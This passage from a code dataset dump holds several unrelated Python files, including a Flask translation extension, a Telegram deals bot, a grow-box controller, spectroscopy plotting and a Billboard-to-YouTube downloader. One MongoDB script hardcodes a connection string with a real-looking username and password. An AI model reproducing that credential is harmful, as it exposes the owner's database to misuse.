hasattr(app, 'extensions'):\n app.extensions = {}\n app.extensions['tml'] = self\n\n app.config.setdefault('TML_DEFAULT_LOCALE', self._default_locale)\n self._config = app.config['TML']\n self._config['logger'] = {}\n self._config['logger']['path']= pj(BASE_DIR, 'logs', 'tml.log')\n\n self.locale_selector_func = None\n\n if self._configure_jinja:\n app.jinja_env.add_extension('jinja2.ext.i18n')\n app.jinja_env.add_extension('tml_jinja2.ext.TMLExtension')\n app.jinja_env.install_gettext_callables(\n lambda x: translator.Translation.instance().ugettext(x),\n lambda s, p, n: translator.Translation.instance().ngettext(s, p, n),\n newstyle=True\n )\n app.jinja_env.install_tr_callables(\n tr=translator.Translation.instance(tml_settings=self._config).tr)\n\n app.before_request(self.activate_tml)\n app.after_request(self.deactivate_tml)\n app.after_request(self.agent_inject)\n self._previous_locale = None\n\n def ignore_tml(self):\n return not request.endpoint or request.endpoint == 'static'\n\n def activate_tml(self):\n if self.ignore_tml(): # ignore initialization of sdk\n return\n source = '%s' % (request.url_rule.endpoint)\n self.translation = translator.Translation.instance(tml_settings=self._config)\n cookie_handler = TmlCookieHandler(request, self.translation.application_key)\n locale = self.translation.get_language_from_request(\n request, cookie_handler, self.app.config)\n if locale != self._previous_locale: # force template cache invalidation\n if self.app.jinja_env.cache:\n self.app.jinja_env.cache.clear()\n self.translation.activate_tml(\n source=source,\n access_token=cookie_handler.tml_access_token,\n translator=cookie_handler.tml_translator,\n locale=locale,\n force_context=True)\n return None\n\n def deactivate_tml(self, response):\n if self.ignore_tml(): # ignore initialization of sdk\n return response\n while self.translation._before_response:\n fn = self.translation._before_response.pop()\n fn(response)\n self._previous_locale = self.translation.locale\n translator.Translation.instance().deactivate_all()\n self.request = None\n self.translation = None\n return response\n\n def agent_inject(self, response):\n if self.ignore_tml(): # ignore initialization of sdk\n return response\n\n agent_config = CONFIG.get('agent', {})\n if not agent_config['force_injection']:\n return response\n\n if agent_config['enabled'] and agent_config['force_injection']:\n data = response.data\n pattern = re.compile(b'', re.IGNORECASE)\n agent_script = self.app.jinja_env.from_string(\"{% tml_inline 'middleware' %}\").render()\n response.data = pattern.sub(bytes(agent_script) + b'', response.data)\n response.headers['Content-Length'] = len(response.data)\n\n return response\n","repo_name":"translationexchange/tml-python-flask","sub_path":"flask_tml/tml.py","file_name":"tml.py","file_ext":"py","file_size_in_byte":4155,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"35984018781","text":"import pymongo\nimport datetime\n\n# Replace the uri string with your MongoDB deployment's connection string.\nconn_str = \"mongodb+srv://Kismet:wZ0vNyvkUENVhg2o@kind-words-cluster.l8p7d.mongodb.net/myFirstDatabase?retryWrites=true&w=majority\"\n\n# set a 5-second connection timeout\nclient = pymongo.MongoClient(conn_str, serverSelectionTimeoutMS=5000)\ndb = client['kind_words-database']\nkw_coll = db['kind-words-collection']\n# req_coll = db['requests-collection']\n# user_coll = db['users-collection']\npost = {\"author\": \"Mike\",\n \"text\": \"My first blog post!\",\n \"tags\": [\"mongodb\", \"python\", \"pymongo\"],\n \"date\": datetime.datetime.utcnow()}\nkw_coll.insert_one(post)\n\ntry:\n print('connected to mongoDB')\nexcept Exception:\n print(\"Unable to connect to the server.\")","repo_name":"johnkismet/kind_words_slack","sub_path":"backend/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"7898818165","text":"from app.logger import getLogger\nfrom datetime import datetime, timedelta\nfrom app.db.database import Database\nfrom telethon import TelegramClient\nfrom telethon.tl.tlobject import TLObject\nimport time\nfrom app.utils import Utils\nfrom app.config.config import Config\nfrom app.models import TelegramMessageModel, TypeDealsModel\nfrom apscheduler.schedulers.asyncio import AsyncIOScheduler\nfrom apscheduler.triggers import interval, date as datetrigger\nfrom apscheduler.events import (\n EVENT_ALL,\n EVENT_JOB_ERROR,\n EVENT_JOB_EXECUTED,\n EVENT_JOB_SUBMITTED,\n EVENT_JOB_ADDED,\n)\nfrom app.generators import image_util\nfrom app.messages.message_system import MessageQueue\n\n\nconfig = Config.get_instance()\nbot = TelegramClient(\"bot\", config.api_id, config.api_hash).start(\n bot_token=config.bot_token\n)\n\nscheduler = AsyncIOScheduler()\nlog = getLogger(\"TELEBOT\")\nmessageQueue = MessageQueue.get_instance()\n\n\nasync def message_system():\n job = scheduler.get_job(\"telegram\")\n if not job or not job.trigger:\n log.info(\n \"Job not found - I assume last run delete the whole scheduling. Rescheduling.\"\n )\n triggers = interval.IntervalTrigger(\n minutes=Utils.delayBetweenTelegramMessages()\n )\n scheduler.add_job(\n message_system,\n trigger=triggers,\n max_instances=1,\n id=\"telegram\",\n next_run_time=datetime.now(),\n )\n if not Utils.can_run():\n log.info(\"Cannot run because it's not between start_hour and end_hour\")\n startHour = config.telegram_start_hour\n endHour = config.telegram_end_hour\n today = datetime.today()\n if startHour and startHour < endHour:\n scheduledTime = datetime(\n year=today.year,\n month=today.month,\n day=today.day,\n hour=startHour,\n minute=0,\n second=0,\n )\n if today.hour > startHour:\n scheduledTime = scheduledTime + timedelta(days=1)\n dateTrigger = datetrigger.DateTrigger(scheduledTime)\n job.reschedule(dateTrigger)\n elif endHour and endHour < startHour:\n scheduledTime = datetime(\n year=today.year,\n month=today.month,\n day=today.day,\n hour=endHour,\n minute=0,\n second=0,\n )\n dateTrigger = datetrigger.DateTrigger(scheduledTime)\n job.reschedule(dateTrigger)\n log.info(f\"Rescheduling the job to {job.next_run_time}\")\n return\n\n db = Database()\n channel_type = config.telegram_type_id\n channel_id = config.telegram_id\n while messageQueue.isLock():\n time.sleep(10)\n valid_deal = messageQueue.nextElem()\n if valid_deal:\n await send_message(\n deal=valid_deal,\n database=db,\n channel_type=channel_type,\n channel_id=channel_id,\n save_on_db=True,\n )\n next_run = datetime.now() + timedelta(\n minutes=Utils.delayBetweenTelegramMessages()\n )\n log.info(\n \"Next post at {next_run}\".format(\n next_run=next_run.strftime(\"%Y/%m/%d %H:%M:%S\")\n )\n )\n else:\n # Send message to admin\n log.info(\n \"I couldn't retrieve any new valid deals. Think about changing your filters\"\n )\n\n\nasync def send_message(\n deal: TypeDealsModel,\n database: Database,\n channel_type: TLObject,\n channel_id: int,\n save_on_db: bool = True,\n):\n _deal = deal.deal\n path = image_util.create_image(\n originalPrice=_deal.originalPrice,\n dealPrice=_deal.dealPrice,\n imageUrl=_deal.imageUrl,\n save_as=_deal.id,\n currency=\"€\"\n )\n if save_on_db:\n database.upsertDeal(deal)\n msg = await bot.send_file(\n channel_type, file=path, caption=Utils.message(deal), force_document=False,\n )\n if save_on_db:\n database.upsertTelegramMessage(\n TelegramMessageModel(id=msg.id, channel_id=channel_id, datetime=msg.date),\n deal,\n )\n image_util.delete_tmp_image(path)\n\n\ndef listener_for_telegram(event):\n if event.code == EVENT_JOB_ERROR:\n print(\"The job crashed :(\")\n scheduler.shutdown(wait=False)\n elif event.code == EVENT_JOB_ADDED:\n log.info(\"Job Added. Ready to be executed\")\n elif event.code == EVENT_JOB_SUBMITTED:\n log.info(\"Job Starting...\")\n elif event.code == EVENT_JOB_EXECUTED:\n log.info(\"Job Finished. Waiting for next run\")\n\n\ndef start():\n log.info(\"TELEBOT STARTED\")\n log.info(\"Adding event listener for issue\")\n scheduler.add_listener(listener_for_telegram, EVENT_ALL | EVENT_JOB_ERROR)\n rangeTime = (\n f\"{config.telegram_start_hour}\" if config.telegram_start_hour else \"\"\n ) + (f\"-{config.telegram_end_hour}\" if config.telegram_end_hour else \"\")\n log.info(f\"Range Time of Working Hours: {rangeTime}\")\n triggers = interval.IntervalTrigger(minutes=Utils.delayBetweenTelegramMessages())\n log.info(\"Creating the Scheduler\")\n scheduler.add_job(\n message_system,\n trigger=triggers,\n max_instances=1,\n id=\"telegram\",\n next_run_time=datetime.now(),\n )\n log.info(\"Scheduler Started\")\n scheduler.start()\n bot.loop.run_forever()\n\n\nif __name__ == \"__main__\":\n log.info(\"**HELLO**\")\n start()\n","repo_name":"antoniocali/deals-bot","sub_path":"app/telegram/telebot.py","file_name":"telebot.py","file_ext":"py","file_size_in_byte":5498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"74128294293","text":"\nfrom Tranche import Tranche\n\n\ndef doWaterfall(loanPool, structuredSecurity):\n \"\"\"\n parameter: a LoanPool object and a StructuredSecurities object\n doWaterfall function will loop through time periods, starting from 0, and keep going until the LoanPool has no\n more active loans\n After the loop completes, the function will return all the results saved down from the getWaterfall function\n (on both asset side liabilities side)\n get a list of IRR of all tranches, a list of DIRR of all tranches, a list of AL of all tranches\n \"\"\"\n\n # reset loans in loanPool and tranches in structuredSecurity\n for tranche in structuredSecurity.args:\n tranche.reset()\n for loan in loanPool.args:\n loan.reset()\n\n # get the maximum period until the LoanPool has no more active loans\n mp = max([loan.term for loan in loanPool.args])\n\n paymentDict = {}\n PrincipalPaymentDict = {}\n for num, tranche in enumerate(structuredSecurity.args):\n paymentDict[num] = []\n PrincipalPaymentDict[num] = []\n\n lwf = []\n swf = []\n cashLeft = []\n\n for i in range(1, mp+1):\n # call checkDefaults on the LoanPool to check if loan in loan Pool default\n loanPool.checkDefaults(i)\n\n # Ask the LoanPool for its total payment for the current time period\n totalPayment = loanPool.totalPaymentDue(i)\n\n # Ask the LoanPool for its total principal payment for the current time period\n totalPrincipalPayment = loanPool.totalPrincipalDue(i)\n\n # Increase the time period on the StructuredSecurities object\n structuredSecurity.increasePeriod()\n\n # Pay the StructuredSecurities with the amount provided by the LoanPool.\n structuredSecurity.makePayments(totalPayment, totalPrincipalPayment)\n\n # Call getWaterfall on both the LoanPool and StructuredSecurities objects and save the info into two variables.\n lwf.append(loanPool.getWaterfall(i))\n z = structuredSecurity.getWaterfall()[0]\n swf.append(structuredSecurity.getWaterfall()[0])\n cashLeft.append(structuredSecurity.getWaterfall()[1])\n\n for num, tranche in enumerate(z):\n # get payment (sum of interest payment and principal payment) of peroid i\n paymentDict[num].append(tranche[1]+tranche[3])\n # get principal payment of period i\n PrincipalPaymentDict[num].append(tranche[3])\n\n # calculate IRR and DIRR\n # get list of total payment (it's a list of list, the inner list show payment of all period of a tranche)\n paymentList = list(paymentDict.values())\n # get list of notional\n notionalList = [tranche.notional for tranche in structuredSecurity.args]\n # get list of tranche rate\n rateList = [tranche.rate for tranche in structuredSecurity.args]\n # calculate IRR using method in Tranche Class, it will return a list of IRR of all tranches\n # calculate DIRR using method in Tranche Class, it will return a list of DIRR of all tranches\n irrList = []\n dirrList = []\n for num, payment in enumerate(paymentList):\n irrList.append(Tranche.irr(notionalList[num], paymentList[num]))\n dirrList.append(Tranche.dirr(rateList[num], notionalList[num], paymentList[num]))\n\n # calculate AL\n # get list of principal payment\n # (it's a list of list, the inner list show principal payment of all period of a tranche)\n principalPaymentList = list(PrincipalPaymentDict.values())\n # calculate AL using method in Tranche Class, it will return a list of AL of all tranches\n alList = []\n for num, principalPayment in enumerate(principalPaymentList):\n alList.append(Tranche.al(notionalList[num], principalPaymentList[num]))\n\n return lwf, swf, cashLeft, irrList, dirrList, alList\n","repo_name":"wrch0712/abs-modeling","sub_path":"doWaterfall.py","file_name":"doWaterfall.py","file_ext":"py","file_size_in_byte":3774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"17590186142","text":"import os\nimport RPi.GPIO as io\nimport json\nimport datetime as dt\nimport writeGrowBoxDates as writeDate\nimport relay\nimport time\nimport sendEmail\n\n#######################################################################################\n#Constants\n#######################################################################################\n#variable for who the notifications for the growbox should be sent to\nemailRecipients = \"just me\"\ntimeOfGrowth = 2 # of weeks the mushrooms will sit in the\ncycleStatus = \"cycleStatus\" #this is added to the full data to indicate if the mushrooms are done or not\n\n#######################################################################################\n#pin setup\n#######################################################################################\nstartButtonPin = 27\nwaterEmptyPin = 25\nwaterFullPin = 6\nredLEDPin = 20 # on if temperature out of range\nblueLEDPin = 19 # on if humidity water level low\nyellowLEDPin = 21 # on if humidity out of range\ngreenLEDPin = 13 # on while grow cycle is in action\nTHSensorLCDPin = 24\nTHSensorWebsitePin = 23\nhumidifierControlPin = 22\nsunlightPin = 5\n\n#######################################################################################\n#Setup GPIO\n#######################################################################################\nio.setwarnings(False)\nio.setmode(io.BCM)\nio.setup(waterEmptyPin, io.IN, pull_up_down=io.PUD_DOWN)\nio.setup(waterFullPin, io.IN, pull_up_down=io.PUD_DOWN)\n\n#######################################################################################\n#Function Definitions\n#######################################################################################\n#function to notify user that the mushroom humidifier needs to be refilled\ndef waterIsLow(channel):\n #Turn Blue indicator LED on\n relay.relayOnOff(blueLEDPin, \"on\")\n \n message = \"\"\"\n Subject: Mushroom Water level is Low\n The Digital water level sensor was triggered, Refill the mushroom humidifier water.\n \"\"\"\n\n #send email\n sendEmail.sendEmail(emailRecipients, message)\n\n#function to turn off blue indicator LED\ndef waterIsHigh(channel):\n relay.relayOnOff(blueLEDPin, \"off\")\n\n#######################################################################################\n#Setup Interrupt pins\n#######################################################################################\n#Setup interrupt for digital water level sensor \nio.add_event_detect(waterEmptyPin, io.RISING, callback=waterIsLow, bouncetime=300)\nio.add_event_detect(waterFullPin, io.FALLING, callback=waterIsHigh, bouncetime=300)\n\n#######################################################################################\n#store the current date and calculate finished date\n#######################################################################################\nstartDate = dt.datetime.now()\nendDate = startDate + dt.timedelta(weeks=timeOfGrowth)\nwriteDate.addDateToData(\"startDate\", startDate.strftime(\"%c\")) #the strftime(\"%c\") will print as \"Tue Apr 30 19:41:43 2019\" for example\nwriteDate.addDateToData(\"endDate\", endDate.strftime(\"%c\")[0:10]) #just using the [0:10] shortens it to \"Tue Apr 30\"\n#write the start and end date to single file (the LCD code will use this so it can read the dates quickly and easily)\ndates = {\"startDate\": startDate.strftime(\"%c\")[0:10], \"endDate\": endDate.strftime(\"%c\")[0:10], \"cycleStatus\": \"in use\"}\nwith open(\"dates.json\", \"w\") as outfile:\n json.dump(dates, outfile)\n\n#######################################################################################\n#turn on green LED to indicate the grow cycle has started\n#and\n#tell the data in the website that the mushrooms are currently in the chamber for the three week cycle\n#######################################################################################\nrelay.relayOnOff(greenLEDPin, \"on\")\nwriteDate.addDateToData(cycleStatus, \"in use\") #the website can use this\n\n#######################################################################################\n#Continuous loop while mushrooms sit in the chamber (just sunlight LED control)\n#######################################################################################\ndaysPast = 0\nwhile daysPast < 3*7: #until 3 weeks have past, keep turning on and off the sunlight in this loop\n hour = 60*60 #one hour in seconds\n\n onTime = 18 * hour # on time is 18 hours\n offTime = 6 * hour # off time is 6 hours\n\n #turn on sunlight (uses inverted logic because of relay)\n relay.relayOnOff(sunlightPin, \"off\")\n time.sleep(onTime)\n\n #turn off sunlight (uses inverted logic because of relay)\n relay.relayOnOff(sunlightPin, \"on\")\n time.sleep(offTime)\n\n daysPast = daysPast + 1\n\n#######################################################################################\n#end of growth cycle, turn stuff off\n#######################################################################################\n#turn off green LED to indicate the grow cycle is over\nrelay.relayOnOff(greenLEDPin, \"off\")\n\n#######################################################################################\n#tell the full data file that the mushrooms are not in the fruiting cycle anymore\n#######################################################################################\nwriteDate.addDateToData(cycleStatus, \"Done\")\n\n#tell that small file that the mushroom grow cycle is over(the LCD code will use this so it can read the dates quickly and easily)\ndates[\"cycleStatus\"] = \"waiting for next batch\" #update the dictionary\nwith open(\"dates.json\", \"w\") as outfile:\n json.dump(dates, outfile)\n\n#######################################################################################\n#Email the user that the mushies are ready\n#######################################################################################\nmushroomEmailMessage = \"\"\"\nSubject: Mushrooms Ready\nHey! your mushrooms are ready for harvesting, Come Get em!\n\"\"\"\n \nsendEmail.sendEmail(emailRecipients, mushroomEmailMessage)\n \n\n\n\n\n","repo_name":"deereeco/GrowBox","sub_path":"Code/startGrowthCycle.py","file_name":"startGrowthCycle.py","file_ext":"py","file_size_in_byte":6063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"71036795734","text":"import html\nimport logging\nimport os\n\nimport bleach\nimport feedparser\nimport tomlkit\nfrom filelock import FileLock\n\nlogger = logging.getLogger(__name__)\n\n\ndef get_unseen_entries(feed_url, state_file=\"state.toml\"):\n \"\"\"Get unseen entries from a feed.\"\"\"\n\n create_state_file(state_file)\n etag, modified = get_feed_headers(state_file)\n latest_feed, new_etag, new_modified = fetch_feed(feed_url, etag, modified)\n save_feed_headers(new_etag, new_modified, state_file)\n seen_ids = get_seen_entry_ids(state_file)\n new = [entry for entry in latest_feed.entries if entry.id not in seen_ids]\n save_entry_ids([entry.id for entry in new], state_file)\n return new\n\n\ndef format_entry(entry):\n \"\"\"Format an entry in HTML.\n\n Clean the HTML to be suitable for Telegram.\"\"\"\n\n title = html.escape(entry.title)\n link = entry.link\n allowed_tags = [\n \"b\",\n \"strong\",\n \"i\",\n \"em\",\n \"u\",\n \"ins\",\n \"s\",\n \"strike\",\n \"del\",\n \"tg-spoiler\",\n \"a\",\n \"tg-emoji\",\n \"code\",\n \"pre\",\n \"li\", # not really allowed\n ]\n allowed_attrs = {\n \"a\": [\"href\"],\n \"tg-emoji\": [\"emoji-id\"],\n \"code\": [\"class\"],\n }\n\n content = \"\"\n for block in entry.content:\n if block.type in (\"text/html\", \"application/xhtml+xml\"):\n cleaned = bleach.clean(\n block.value, tags=allowed_tags, attributes=allowed_attrs, strip=True\n )\n cleaned = cleaned.replace(\"\\n\", \" \").replace(\"
  • \", \"\\n• \").replace(\"
  • \", \"\")\n content += cleaned + \"\\n\"\n\n elif block.type == \"text/plain\":\n content += f\"{html.escape(block.value)}\\n\"\n\n # telegram handles soft hyphens as zero-width spaces and inserts\n # line breaks without hyphens\n content = content.replace(\"\\u00ad\", \"\").replace(\"­\", \"\")\n result = f'
    {title}\\n{content}'\n logger.info(f\"Formatted entry: {result!r}\")\n return result\n\n\ndef create_state_file(file_path):\n \"\"\"Create a TOML file if it doesn't exist.\"\"\"\n with FileLock(file_path + \".lock\"):\n with open(file_path, \"a\") as f:\n f.write(\"\")\n\n\ndef fetch_feed(feed_url, etag=None, modified=None):\n \"\"\"Fetch the feed and return parsed feed along with ETag and Last-Modified values.\"\"\"\n feed = feedparser.parse(feed_url, etag=etag, modified=modified)\n return feed, feed.get(\"etag\"), feed.get(\"modified\")\n\n\ndef save_feed_headers(etag, modified, file_path):\n \"\"\"Save the ETag and Last-Modified values to a TOML file.\"\"\"\n with FileLock(file_path + \".lock\"):\n with open(file_path, \"r+t\") as f:\n data = tomlkit.load(f)\n os.ftruncate(f.fileno(), 0)\n os.lseek(f.fileno(), 0, os.SEEK_SET)\n if \"feed\" not in data:\n feed = tomlkit.table()\n data[\"feed\"] = feed\n else:\n feed = data[\"feed\"]\n if etag:\n feed[\"etag\"] = etag\n if modified:\n feed[\"modified\"] = modified\n tomlkit.dump(data, f)\n\n\ndef get_feed_headers(file_path):\n try:\n with FileLock(file_path + \".lock\"):\n with open(file_path, \"r\") as f:\n data = tomlkit.load(f)\n feed = data[\"feed\"]\n etag = feed[\"etag\"] if \"etag\" in feed else None\n modified = feed[\"modified\"] if \"modified\" in feed else None\n return etag, modified\n except (FileNotFoundError, KeyError):\n print(\"No state file found, fetching feed from scratch.\")\n return None, None\n\n\ndef save_entry_ids(entry_ids, file_path):\n \"\"\"Save the seen entry IDs.\"\"\"\n with FileLock(file_path + \".lock\"):\n with open(file_path, \"r+t\") as f:\n data = tomlkit.load(f)\n os.ftruncate(f.fileno(), 0)\n os.lseek(f.fileno(), 0, os.SEEK_SET)\n if \"entries_seen\" not in data:\n seen = tomlkit.array()\n seen.multiline(True)\n data[\"entries_seen\"] = seen\n else:\n seen = data[\"entries_seen\"]\n seen.extend(entry_ids)\n tomlkit.dump(data, f)\n\n\ndef get_seen_entry_ids(file_path):\n try:\n with FileLock(file_path + \".lock\"):\n with open(file_path, \"r\") as f:\n data = tomlkit.load(f)\n return set(data.get(\"entries_seen\", []))\n except FileNotFoundError:\n return set()\n","repo_name":"matematiikkakilpailut/matematiikkavalmennusbot","sub_path":"matematiikkavalmennusbot/rss.py","file_name":"rss.py","file_ext":"py","file_size_in_byte":4465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"20434887896","text":"import numpy as np\nfrom scipy import optimize as opt\nfrom scipy import signal\nimport os\nfrom tkinter import filedialog\n\nimport matplotlib.pyplot as plt\nimport asyncio\n\nimport matplotlib.pyplot as plt\nfrom matplotlib import cm\nimport matplotlib.colors as colors\nfrom matplotlib.colors import LinearSegmentedColormap\n\n\ndirpath2d = os.path.dirname(os.path.dirname(__file__))\n\ndef check_npy():\n filenames = filedialog.askopenfilenames(initialdir = str(dirpath2d), \n title = \"Open Files\") \n pathtup = filenames\n\n for datafile in pathtup:\n arr = np.load(datafile)\n print(arr)\n\ndef import_trirdata():\n filenames = filedialog.askopenfilenames(initialdir = str(dirpath2d), \n title = \"Open Files\") \n pathtup = filenames\n datadir = os.path.dirname(os.path.dirname(pathtup[0]))\n\n\n search_files =os.listdir(datadir)\n for file in search_files:\n if 'delay_file' in str(file):\n delayfile= str(file)\n if 'probe_wn_axis' in str(file):\n wnfile = str(file)\n\n print('Delay file loaded')\n delay = np.load(str(datadir+'/'+delayfile))\n print(delay)\n delay = 10**(-3) * (delay[:,0])\n print('wavenumberfile loaded')\n wn = np.load(str(datadir+'/'+wnfile))\n\n d2pump = np.zeros((len(wn),1))\n d2nonpump = np.zeros((len(wn),1))\n for datafile in pathtup:\n arr = np.load(datafile)\n pumped = np.reshape(arr[:,0],(32,1))\n nonpumped = np.reshape(arr[:,1],(32,1))\n d2pump = np.hstack((d2pump,pumped))\n d2nonpump = np.hstack((d2nonpump,nonpumped))\n\n d2pump = d2pump[:,1:]\n d2nonpump = d2nonpump[:,1:]\n \n return delay, wn, d2pump, d2nonpump\n\ndef data_treatment(pump_arr, nonpump_arr):\n data = np.subtract(pump_arr, nonpump_arr)\n return data\n\ndef sub_scan1(DIFF):\n scan1= DIFF[:,0]\n subDIFF = scan1\n for i in range(len(DIFF[0,:])-1):\n subDIFF = np.vstack((subDIFF, scan1))\n \n subDIFF = np.transpose(subDIFF)\n newDIFF = np.subtract(DIFF,subDIFF)\n return newDIFF\n\ndef getOD(P,NP):\n P = -1* np.log10(P)\n NP = -1* np.log10(NP)\n newDIFF = np.subtract(P,NP)\n return newDIFF\n\ndef sub_numerous(DIFF,scannumbers):\n scanlist = str(scannumbers).split(',')\n scanpart= DIFF[:,int(scanlist[0]):int(scanlist[1])]\n scanmid = np.mean(scanpart,axis=1)\n\n subDIFF = scanmid\n for i in range(len(DIFF[0,:])-1):\n subDIFF = np.vstack((subDIFF, scanmid))\n \n subDIFF = np.transpose(subDIFF)\n newDIFF = np.subtract(DIFF,subDIFF)\n return newDIFF\n\n\n\n\n\ndef plot_trir(X,Y,P,colormap,cmin,cmax):\n fig = plt.figure(figsize=(10, 8))\n grid = fig.add_gridspec(6, 6, hspace=0.7, wspace=0.7)\n main_ax = fig.add_subplot(grid[1:-1, 1:])\n y_hist = fig.add_subplot(grid[1:-1, 0],sharey=main_ax)\n x_hist = fig.add_subplot(grid[0, 1:-1], sharex=main_ax)\n\n cdict = {'red': ((0.0, 0.0, 0.0),\n (0.5, 1.0, 1.0),\n (1.0, 1.0, 1.0)),\n\n 'green': ((0.0, 0.0, 0.0),\n (0.25, 0.0, 0.0),\n (0.75, 0.0, 0.0),\n (1.0, 0.0, 0.0)),\n\n 'blue': ((0.0, 1.0, 1.0),\n (0.5, 1.0, 1.0),\n (1.0, 0.0, 0.0)),\n\n 'alpha': ((0.0, 1.0, 1.0),\n # (0.25,1.0, 1.0),\n (0.5, 0.3, 0.3),\n # (0.75,1.0, 1.0),\n (1.0, 1.0, 1.0))}\n\n colormap = LinearSegmentedColormap('BlueRed1', cdict)\n map=main_ax.contourf(X,Y,P,levels=500,cmap=colormap,norm=colors.CenteredNorm(),alpha=.5)#,vmin=cmin,vmax=cmax)\n main_ax.contour(X,Y,P,levels=20,colors='k',alpha=.5,linewidths=.2,vmin=cmin,vmax=cmax)\n fig.colorbar(map, ax=main_ax) \n\n plt.show()\n \n#X,Y,P,NP = import_trirdata()\n\"\"\"\n#print(np.shape(X))\n#print(np.shape(Y))\nprint(np.shape(P))\nprint(np.shape(NP))\n\nI = data_treatment(P,NP)\n\nplot_trir(X,Y,I,'RdBu_r',-0.001,0.001)\n#check_npy()\n \"\"\"\n","repo_name":"MSchick27/spektraM","sub_path":"irspectra/TRIR.py","file_name":"TRIR.py","file_ext":"py","file_size_in_byte":3976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"41995186791","text":"def add(index, string):\n index = int(index)\n if 0 <= index <= len(stops):\n back = stops[:index]\n front = stops[index:]\n new = back + string + front\n else:\n new = stops\n return new\n\n\ndef remove(start, end):\n start = int(start)\n end = int(end)\n if 0 <= start <= end < len(stops):\n back = stops[0:start]\n front = stops[end+1:]\n new = back + front\n else:\n new = stops\n return new\n\n\ndef switch(old_string, new_string):\n if old_string in stops:\n new = stops.replace(old_string, new_string)\n else:\n new = stops\n return new\n\n\n\nstops = input()\nwhile True:\n command = input()\n if command == 'Travel':\n break\n command = command.split(':')\n action = command[0]\n if action == 'Add Stop':\n stops = add(command[1], command[2])\n elif action == 'Remove Stop':\n stops = remove(command[1], command[2])\n elif action == 'Switch':\n stops = switch(command[1], command[2])\n print(stops)\nprint(f'Ready for world tour! Planned stops: {stops}')\n","repo_name":"kzhelyazkov81/exam_05.07.2020","sub_path":"04_world_tour.py","file_name":"04_world_tour.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"15836881852","text":"# 첫째 줄에 N(2 ≤ N ≤ 50)과 M(1 ≤ M ≤ 13)이 주어진다.\n# 둘째 줄부터 N개의 줄에는 도시의 정보가 주어진다.\n# 도시의 정보는 0, 1, 2로 이루어져 있고, 0은 빈 칸, 1은 집, 2는 치킨집을 의미한다. \n# 집의 개수는 2N개를 넘지 않으며, 적어도 1개는 존재한다. 치킨집의 개수는 M보다 크거나 같고, 13보다 작거나 같다.\n\nN, M = map(int, input().split()) # \n\n_map = []\nhome = []\nchicken = []\n\nfor i in range(N):\n _map.append(list(map(int, input().split())))\n\n for j in range(N):\n \n if _map[i][j] == 2:\n chicken.append((i, j))\n\n if _map[i][j] == 1:\n home.append((i, j))\n\n\ntotalA = []\nfor i in home:\n result = 0\n x, y = i\n\n for j in chicken:\n cx, cy = j\n\n total = abs(x - cx) + abs(y - cy)\n \n if result == 0:\n result = total\n totalA.append(result)\n if result > total:\n result = total\n \n\n\nprint(totalA)\nprint(result)\n","repo_name":"mark1346/coding_test_study","sub_path":"minho/13.py","file_name":"13.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72736673834","text":"'''\nA Program that scrapes the billboard top 100 list and then search for that title/artist on Youtube,\nthen crudely selects the most-likely-to-be-music url out of the search results, then downloads all\nthe songs into a designated folder.\n\nCreated on 2018/May/18 by Junwoo HWANG.\n\nReferences\n------------------------------------------------------------------------------------------------\n1. Returning list from Youtube Query Search : https://stackoverflow.com/questions/29069444/returning-the-urls-as-a-list-from-a-youtube-search-query\n2. Downloading Youtube mp3 files : http://willdrevo.com/downloading-youtube-and-soundcloud-audio-with-python-and-pandas\n3. Billboard charts package : https://github.com/guoguo12/billboard-charts\n4. Check if file exists(or, is a file) : https://stackoverflow.com/questions/82831/how-to-check-whether-a-file-exists\n5. Getting current time in format : https://stackoverflow.com/questions/415511/how-to-get-current-time-in-python\n6. Youtube-dl options : https://github.com/rg3/youtube-dl/blob/master/youtube_dl/YoutubeDL.py\n------------------------------------------------------------------------------------------------\n\nNote\n------------------------------------------------------------------------------------------------\n- maybe use '--no-mtime' option to set time-stamp of Files as the time of creation on memory...\n\n+) There is a Program that collects the most 'likely' to be music from youtube in\nmore thoughtful way! => (https://github.com/ritiek/spotify-downloader)\n\n+) There EXISTS a project that 'automatically creates spotify playlist by using billboard module',\n=> (http://aguo.us/writings/spotify-billboard.html)\n\n+) So if I just add the 'downloader' part, the whole top_100 would be downloaded with album cover\nand everything... Muucchhh better!\n------------------------------------------------------------------------------------------------\n'''\n\nimport urllib.request, urllib.parse, urllib.error\nimport urllib.request, urllib.error, urllib.parse\nfrom bs4 import BeautifulSoup\n\nimport youtube_dl\nimport os\n\nimport billboard\n\nimport time\n\n################################################################################\n\ndef get_vid_links_by_Search(text):\n\tquery = urllib.parse.quote(text)\n\turl = \"https://www.youtube.com/results?search_query=\" + query\n\tresponse = urllib.request.urlopen(url)\n\thtml = response.read()\n\tsoup = BeautifulSoup(html, \"html.parser\")\n\n\threfs = [vid['href'] for vid in soup.findAll(attrs={'class':'yt-uix-tile-link'})]\n\tvid_links = [('https://www.youtube.com' + l) for l in hrefs if (l[:9] == '/watch?v=') ]#Select only 'videos'. Not Channel or anything.\n\t#print(('https://www.youtube.com' + vid['href']))\n\n\treturn vid_links\n\n################################################################################\n#############################\nDefault_save_folder = 'MP3_files'\n\n# create YouTube downloader\noptions = {\n\t'format': 'bestaudio/best', # choice of quality\n\t'extractaudio' : True, # only keep the audio\n\t'audioformat' : \"mp3\", # convert to mp3 \n\t'outtmpl': '%(id)s', # name the file the ID of the video\n\t'noplaylist' : True, # only download single song, not playlist\n\t'quiet' : True #Do not print messages to stdout.\n\t}\n\nydl = youtube_dl.YoutubeDL(options)\n\ndef delete_files_in_folder_by_asking(folder_name):\n\tlistdirs = 